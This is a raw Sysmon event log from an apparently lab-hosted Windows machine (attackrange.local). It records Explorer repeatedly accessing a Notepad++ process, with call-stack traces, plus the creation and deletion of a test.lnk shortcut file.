07:48:31.938{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.937{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.937{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.936{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.935{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.935{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.935{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.934{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.934{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.934{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.934{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.933{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.933{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.933{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001047474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 10341000x80000000000000001047473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=D284B5E9FD9C2C2DC120D737DFA1E4B4,SHA256=483E0C0BCE8C7DD9A404AB04127D83096E949DCFC278CC5BB112B84345955D34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
